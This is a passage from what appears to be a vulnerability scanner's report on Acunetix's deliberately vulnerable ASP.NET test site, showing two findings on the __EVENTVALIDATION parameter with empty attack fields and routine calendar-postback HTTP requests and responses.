test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8492&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBA0TMNM9sIZGRkNt9Wzw8e7RHFFy7G9sNL1GAtaLw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLcuPbTAQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdaFII12mHc7bndboOc5DHANPwR1Q%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:40 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBA0TMNM9sIZGRkNt9Wzw8e7RHFFy7G9sNL1GAtaLw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLcuPbTAQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdaFII12mHc7bndboOc5DHANPwR1Q==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:White" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8258&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAJ28se9oIZGRkcZh7ATUlOSdPlg5KvE11fEiy68Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLD%2Bv%2FaCAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268D2BFOCvcK0xbi56cGRclC%2BtARp1c%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:05 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAJ28se9oIZGRkcZh7ATUlOSdPlg5KvE11fEiy68Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLD+v/aCAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268D2BFOCvcK0xbi56cGRclC+tARp1c=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:White" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 